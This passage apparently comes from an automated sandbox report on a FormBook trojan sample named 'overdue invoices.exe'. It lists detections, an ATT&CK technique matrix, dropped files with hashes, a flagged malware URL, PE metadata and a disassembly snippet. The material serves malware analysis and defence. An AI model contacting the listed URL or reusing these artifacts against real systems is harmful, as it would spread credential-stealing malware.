          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.overdue invoices.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.overdue invoices.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.385434941.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.399598391.000000000F71F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625777467.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625289647.0000000002890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625199812.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.350667334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.443082963.00000000008B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception312
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Virtualization/Sandbox Evasion          		LSASS Memory241
          Security Software Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth1
          Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)312
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          overdue invoices.exe36%VirustotalBrowse
          overdue invoices.exe26%ReversingLabsWin32.Trojan.Risis
          overdue invoices.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll19%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll16%ReversingLabsWin32.Trojan.Sdum

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          20.0.explorer.exe.88e796c.8.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.overdue invoices.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.0.explorer.exe.88e796c.6.unpack100%AviraTR/Patched.Ren.GenDownload File
          20.0.explorer.exe.88e796c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.overdue invoices.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.overdue invoices.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.overdue invoices.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.overdue invoices.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.overdue invoices.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.0.explorer.exe.88e796c.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          11.2.svchost.exe.2c16000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.overdue invoices.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          11.2.svchost.exe.383796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.overdue invoices.exe.21a0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.overdue invoices.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.storenight.store/rh64/3%VirustotalBrowse
          www.storenight.store/rh64/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.storenight.store/rh64/true
          • 3%, Virustotal, Browse
          • Avira URL Cloud: malware
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.389880290.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.357320779.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.420908981.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.371882109.000000000095C000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://nsis.sf.net/NSIS_Erroroverdue invoices.exe, overdue invoices.exe, 00000000.00000000.342336809.0000000000409000.00000008.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000001.00000000.346609456.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorErroroverdue invoices.exe, 00000000.00000000.342336809.0000000000409000.00000008.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmp, overdue invoices.exe, 00000001.00000000.346609456.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious

                Private

                IP
                192.168.2.1

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:562159
                Start date:28.01.2022
                Start time:15:17:55
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 42s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:overdue invoices.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:31
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@9/4@0/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 65.2% (good quality ratio 59.7%)
                • Quality average: 72.2%
                • Quality standard deviation: 31.6%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 100
                • Number of non-executed functions: 152
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtEnumerateValueKey calls found.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:20:17API Interceptor133x Sleep call for process: explorer.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\8y4ukil5ffpt2o

                Download File
                Process:C:\Users\user\Desktop\overdue invoices.exe
                File Type:data
                Category:dropped
                Size (bytes):218569
                Entropy (8bit):7.994840241040685
                Encrypted:true
                SSDEEP:6144:JzkhtuwSrhQwHd/yprd9NGAOhxr9xN+abfRzyqtgR71GO:wtutltdCB/TO7PN+UfRzyx1GO
                MD5:A2B4716C51728E07EE484B239DE63E38
                SHA1:ABD1539EBA912CD443BACBDC6F4AB5B5DD9297ED
                SHA-256:97E5CD0634551C8FFBBF5CAE36DC4477AE7477EDE0B21F55887FF703C6DB5BF3
                SHA-512:92BF047D0AC3B6D8F4CC6AA48DD88A815346B9879DE26A746ED70B12C57280CBEED3CD1782BCE75CDFC5F5E11E11EFF2D14A814E8441C7A6B3A961B2A9A1B8A0
                Malicious:false
                Reputation:low
                Preview:..h._c.-...XJq.V.........S?.G._.h.....+q...K*.j.X.8f........v.....g*,.7..u|w(2.6..E....I..|.Z..[y....q ...Z.r...s1R.L.. .w....#.X....J\.....J]...5..|.I.KE~e...C...|I.@;....p...".U..v..U...In.N6vm.$..*..s...Q..f.....~>......N50`TQDm.G../. U.j.]/..Ec.-..P.R....!..M...<..>hG._.......+qf..K*.j.X.8f....K...&.5.;\.]..<.v.Y.;?........5W..u*.o...X.p......>....e.1R.L.. ..A..B...n.[..&.'b.*..i.....-N4ko.J@.V.~c[....R...|..p...)OU.~... l...n.N6vmY$..=...r.LdQ..f......>......N50.TQ.m.G../. ..j../..Ec.-..\.R.....!..M.".<..>.G._.h.....+q...K*.j.X.8f....K...&.5.;\.]..<.v.Y.;?........5W..u*.o...X.p......>....e.1R.L.. ..A..B...n.[..&.'b.*..i.....-N4ko.J@.V.~c[....R.;....p.....U.J...t...In.N6vmY$..=...s.L.Q..f......>......N50.TQ.m.G../. ..j../..Ec.-..\.R.....!..M.".<..>.G._.h.....+q...K*.j.X.8f....K...&.5.;\.]..<.v.Y.;?........5W..u*.o...X.p......>....e.1R.L.. ..A..B...n.[..&.'b.*..i.....-N4ko.J@.V.~c[....R.;....p.....U.J...t...In.N6vmY$..=...s.L.Q..f......>....

                C:\Users\user\AppData\Local\Temp\beukyly

                Download File
                Process:C:\Users\user\Desktop\overdue invoices.exe
                File Type:data
                Category:dropped
                Size (bytes):4881
                Entropy (8bit):6.16370682106836
                Encrypted:false
                SSDEEP:96:NtYlIQFqs1Tjge1qVOERr//qaQcaEi6o6qKfNfdbN9udv8N+6aym86BUecxC:wXg6Tjg6sF5/qLJ6XqKZdOdv/6y863
                MD5:EEA52E8D3BE9A6E4268857A90F646400
                SHA1:4A3F1D30AAEE7CBE4F89E8098C1120B9D79B86A9
                SHA-256:4404F10E023A62DB4445FF0BCE7118B4A8CFB4DBA282D1BF3145F07901620B91
                SHA-512:C54C0F48738D52FDD101E1B9EA98FAEDF723EAA59260DDD7F3C36AEF9C0351B50D2A6EAC5627D28FEA73B0EBD52433A45988DB25F8633B373545AFCA5218BC83
                Malicious:false
                Reputation:low
                Preview:bC@;;.........;..{..,.[..{..,....#;..'s;;;..O;(..(.+..#.&;;;..C..G(..(.+..#.;;;..k..o(..(.+..#.l;;;..S..W(..(.+..#.i;;;..{.....+?..5..4{<<.....[.._..+..?............'.?j.m5+.P....<.'.?}..'....O._.5..;;;;.?.>Tt.'(.C.(.k.(.S..(.{..(.[.(..Q.+...P....O...*..(.C.....>...<.'.;;;;...?.;;;.?..T..O.......^.}.;.....{..,.#....;...L.....;..+./j..#..j?..'....;.....*..#..'.^.}.;31%....=;;.9=;;}/;3.(H...=;;..=;;}.;3.....=;;..=;;}.;...s..{..,....#+;;;..C..'..#;.1..'.;;..'...'..#...#._./>;;.{......5..4.;...C...G....5..jJ;...C...G5=5..4{;..>C.3.(H..Z*;;.Y&((..O......(....(((..O..O;.A...;.@...*;;;...^.}?;......{..,....#s;;;..{..'..#;.1..'.;;..'...'..#...#._..?;;.{...;;;....5..4.;...{........5..jJ;...{......+.5..ZJ...{....../..5..4m<...{........5..jJ=...{....5>5..4{;..>{.31%...a;;;.\'((..O...;.........*.0(..(./(.+(..(....)((..O..O;.A...;.@...*;;;...^.}/;......#+;;;.._..'..#;.1..'.;;..'...'..#...#._.5<;;.{......5..4.;..._........5..jJ;..._....5=5..4{;..>_.3.... ;;;..'((..O..(.

                C:\Users\user\AppData\Local\Temp\nsz4670.tmp

                Download File
                Process:C:\Users\user\Desktop\overdue invoices.exe
                File Type:data
                Category:dropped
                Size (bytes):269344
                Entropy (8bit):7.673336729910951
                Encrypted:false
                SSDEEP:6144:LX6zkhtuwSrhQwHd/yprd9NGAOhxr9xN+abfRzyqtgR71GHDw:5tutltdCB/TO7PN+UfRzyx1GH
                MD5:42D350914397CBD208C16387FA16F6C8
                SHA1:48196391E4E3B34D993031BC5E2F9D41101F524A
                SHA-256:E74B59373153E10A79B5F842A6AA0A5E81C791308A2C68E4EF891A683B1E6C7C
                SHA-512:3909EDDE6DD3C9D308B3B0A52A1CB01ABCDB051F96BADAA2C69E5FF0FDDE1F8E1E7E8DA3E2014140259340E1CC7DC827AAA5CE559BBBC4A28E4E7E91FFF69FBE
                Malicious:false
                Reputation:low
                Preview:6a......,...................0...4K......P`.......a..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll

                Download File
                Process:C:\Users\user\Desktop\overdue invoices.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):20992
                Entropy (8bit):5.7440203845912166
                Encrypted:false
                SSDEEP:384:96PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbofub8:9G1albrXY0HwinMdZeUhbomb
                MD5:13A034A08CE0C32CCD5F18F71518DB26
                SHA1:DFD650892733715B3172CBBCC2456D87C0C5C6D4
                SHA-256:598452578751D1C75F6C6F945D814DBAA104FFF2BFC3D37E125CDDB0F434450F
                SHA-512:F3247A0CF9E3304E86E5FF9496FF70D10DBA2584F28651225CAD320D07821E16D952AE2D93FDF308869A1787FEBA6425C5F9D39FF1ED5814A6EA648BB9F0E25E
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 19%, Browse
                • Antivirus: ReversingLabs, Detection: 16%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0...0...0...[...0...0..0..Mn...0..Mn...0..Hn...0..Mn...0..Rich.0..................PE..L....-.a...........!.....@...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.rsrc........`.......N..............@..@.reloc.......p.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.930922900924507
                TrID:
                • Win32 Executable (generic) a (10002005/4) 92.16%
                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:overdue invoices.exe
                File size:256415
                MD5:e53e6bdf25f7c3bca385a3021e373061
                SHA1:3c91623488f8e645d8f55b802c78c46a86e968da
                SHA256:a2e21d596824ac07de0a0835065fdf00bce5b233c537355edc49e7c10f7b8667
                SHA512:a54df3b4f56156b00fb1799caf305e1384b9d0f2c489f7e66baa921c70ec0ebbd251c049fa6ecea06f81f94f90cccc0154da82e4716fc58e0b528f4d766c610a
                SSDEEP:6144:owfSTftYMNfs8em/DkuBvGwsBQJb4veqz:7glTN08emod9F2qz
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                File Icon

                Icon Hash:b2a88c96b2ca6a72

                Static PE Info

                General

                Entrypoint:0x403225
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:099c0646ea7282d232219f8807883be0

                Entrypoint Preview

                Instruction
                sub esp, 00000180h
                push ebx
                push ebp
                push esi
                xor ebx, ebx
                push edi
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 00409128h
                xor esi, esi
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [00407030h]
                push 00008001h
                call dword ptr [004070B4h]
                push ebx
                call dword ptr [0040727Ch]
                push 00000008h
                mov dword ptr [00423F58h], eax
                call 00007FD078B84290h
                mov dword ptr [00423EA4h], eax
                push ebx
                lea eax, dword ptr [esp+34h]
                push 00000160h
                push eax
                push ebx
                push 0041F450h
                call dword ptr [00407158h]
                push 004091B0h
                push 004236A0h
                call 00007FD078B83F47h
                call dword ptr [004070B0h]
                mov edi, 00429000h
                push eax
                push edi
                call 00007FD078B83F35h
                push ebx
                call dword ptr [0040710Ch]
                cmp byte ptr [00429000h], 00000022h
                mov dword ptr [00423EA0h], eax
                mov eax, edi
                jne 00007FD078B8175Ch
                mov byte ptr [esp+14h], 00000022h
                mov eax, 00429001h
                push dword ptr [esp+14h]
                push eax
                call 00007FD078B83A28h
                push eax
                call dword ptr [0040721Ch]
                mov dword ptr [esp+1Ch], eax
                jmp 00007FD078B817B5h
                cmp cl, 00000020h
                jne 00007FD078B81758h
                inc eax
                cmp byte ptr [eax], 00000020h
                je 00007FD078B8174Ch
                cmp byte ptr [eax], 00000022h
                mov byte ptr [eax+eax+00h], 00000000h

                Rich Headers

                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x2c1900x2e8dataEnglishUnited States
                RT_DIALOG0x2c4780x100dataEnglishUnited States
                RT_DIALOG0x2c5780x11cdataEnglishUnited States
                RT_DIALOG0x2c6980x60dataEnglishUnited States
                RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                Imports

                DLLImport
                KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                No network behavior found

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:15:18:52
                Start date:28/01/2022
                Path:C:\Users\user\Desktop\overdue invoices.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\overdue invoices.exe"
                Imagebase:0x400000
                File size:256415 bytes
                MD5 hash:E53E6BDF25F7C3BCA385A3021E373061
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.353489816.00000000021A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Target ID:1
                Start time:15:18:54
                Start date:28/01/2022
                Path:C:\Users\user\Desktop\overdue invoices.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\overdue invoices.exe"
                Imagebase:0x400000
                File size:256415 bytes
                MD5 hash:E53E6BDF25F7C3BCA385A3021E373061
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.443132188.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.351727367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
